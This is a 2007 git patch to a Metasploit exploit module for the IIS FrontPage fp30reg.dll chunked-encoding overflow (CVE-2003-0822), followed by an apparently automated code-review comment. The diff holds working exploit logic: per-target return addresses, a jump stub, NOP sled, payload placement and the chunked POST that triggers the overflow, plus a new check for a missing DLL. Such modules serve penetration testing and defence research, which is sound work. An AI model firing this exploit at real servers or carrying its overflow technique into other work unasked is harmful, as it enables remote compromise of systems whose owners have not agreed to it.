From 06899ee8957f56dc96429f2f69c282cdde5fe9af Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Tue, 27 Feb 2007 09:31:54 +0000
Subject: [PATCH] This should fix #39, the exploit will detect when the DLL is not installed
git-svn-id: file:///home/svn/framework3/trunk@4484 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../exploits/windows/isapi/fp30reg_chunked.rb | 66 +++++++++++--------
 1 file changed, 40 insertions(+), 26 deletions(-)
diff --git a/modules/exploits/windows/isapi/fp30reg_chunked.rb b/modules/exploits/windows/isapi/fp30reg_chunked.rb
index 2e8f241769..8585991bb6 100644
--- a/modules/exploits/windows/isapi/fp30reg_chunked.rb
+++ b/modules/exploits/windows/isapi/fp30reg_chunked.rb
@@ -1,5 +1,5 @@
 ##
-# $Id:$
+# $Id$
 ##
 ##
@@ -39,7 +39,6 @@ class Exploits::Windows::Isapi::IIS_FP30REG_Chunked < Msf::Exploit::Remote
 [ 'CVE', ' 2003-0822'],
 [ 'MSB', 'MS03-051'],
 [ 'MIL', '29'],
- ],
 'Privileged' => false,
 'Payload' =>
@@ -54,55 +53,70 @@ class Exploits::Windows::Isapi::IIS_FP30REG_Chunked < Msf::Exploit::Remote [ ['Windows 2000 SP0-SP3', { 'Ret' => 0x6c38a4d0 }], # from mfc42.dll ['Windows 2000 07/22/02', { 'Ret' => 0x67d44eb1 }], # from fp30reg.dll 07/22/2002 - ['Windows 2000 10/06/99', { 'Ret' => 0x67d4665d }], # from fp30reg.dll 10/06/1999 - - + ['Windows 2000 10/06/99', { 'Ret' => 0x67d4665d }], # from fp30reg.dll 10/06/1999 ], 'DisclosureDate' => 'Nov 11 2003', 'DefaultTarget' => 0)) register_options( [ - OptString.new('URL', [ true, "The path to fp30reg.dll.dll", "/_vti_bin/_vti_aut/fp30reg.dll" ]), - ], self.class) - + OptString.new('URL', [ true, "The path to fp30reg.dll", "/_vti_bin/_vti_aut/fp30reg.dll" ]), + ], self.class) end def exploit - c = connect - + + print_status("Creating overflow request for fp30reg.dll...") + pat = Rex::Text.rand_text_alphanumeric(0xdead) pat[128, 4] = [target.ret].pack('V') pat[264, 4] = [target.ret].pack('V') + + # sub eax,0xfffffeff; jmp eax pat[160, 7] = "\x2d\xff\xfe\xff\xff" + "\xff\xe0" + pat[280, 512] = make_nops(512) pat[792, payload.encoded.length] = payload.encoded - 1.upto(15) do |i| + 0.upto(15) do |i| if (i % 3 == 0) - print_status("Refreshing the remote DLLHost.exe process...") - send_request_raw({ + print_status("Refreshing the remote dllhost.exe process...") + + res = send_request_raw({ 'uri' => datastore['URL'] - }, -1) + }, -1) + + if (res and res.body =~ /specified module could not be found/) + print_status("The server states that #{datastore['URL']} does not exist.\n") + return + end end print_status("Trying to exploit fp30reg.dll (request #{i.to_s} of 15)") - send_request_raw({ - 'uri' => datastore['URL'], - 'method' => 'POST', - 'headers' => - { - 'Transfer-Encoding' => 'Chunked' - }, - 'data' => "DEAD\r\n#{pat}\r\n0\r\n" - }, 5) + begin + res = send_request_raw({ + 'uri' => datastore['URL'], + 'method' => 'POST', + 'headers' => + { + 'Transfer-Encoding' => 'Chunked' + }, + 'data' => "DEAD\r\n#{pat}\r\n0\r\n" + }, 5) 
- sock.put(req)
- sleep(1)
+ if (res and res.body =~ /specified module could not be found/)
+ print_status("The server states that #{datastore['URL']} does not exist.\n")
+ return
+ end
+ rescue ::Exception => e
+ p e
+ p e.class
+ end
 handler
- disconnect
+
+ sleep(1)
 end
 end
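Review bot: The new `rescue ::Exception => e` around the POST in the exploit loop catches every Ruby exception, including `::Interrupt`, `::SystemExit` and `::NoMemoryError`, so a Ctrl-C during the 16 attempts is swallowed, dumped with `p`, and the loop carries on into `handler`; rescue only what the request can raise, e.g. `rescue ::Rex::ConnectionError, ::Timeout::Error, ::EOFError => e` followed by `print_error("Request failed: #{e.class}: #{e}")`, since `p e` writes to stdout rather than the module's output sink. The missing-DLL test is pasted twice (after the refresh GET and after the POST); a small helper such as `dll_missing?(res)` wrapping `res and res.body =~ /specified module could not be found/` would keep the two copies in step. With `0.upto(15)` the status line now reads `request 0 of 15` for the first of sixteen attempts; `"Trying to exploit fp30reg.dll (request #{i + 1} of 16)"` matches what the loop does, and the `i.to_s` inside the interpolation is redundant. The trailing `"\n"` in the two "does not exist" messages adds a blank line after `print_status` already ends the line and can be dropped.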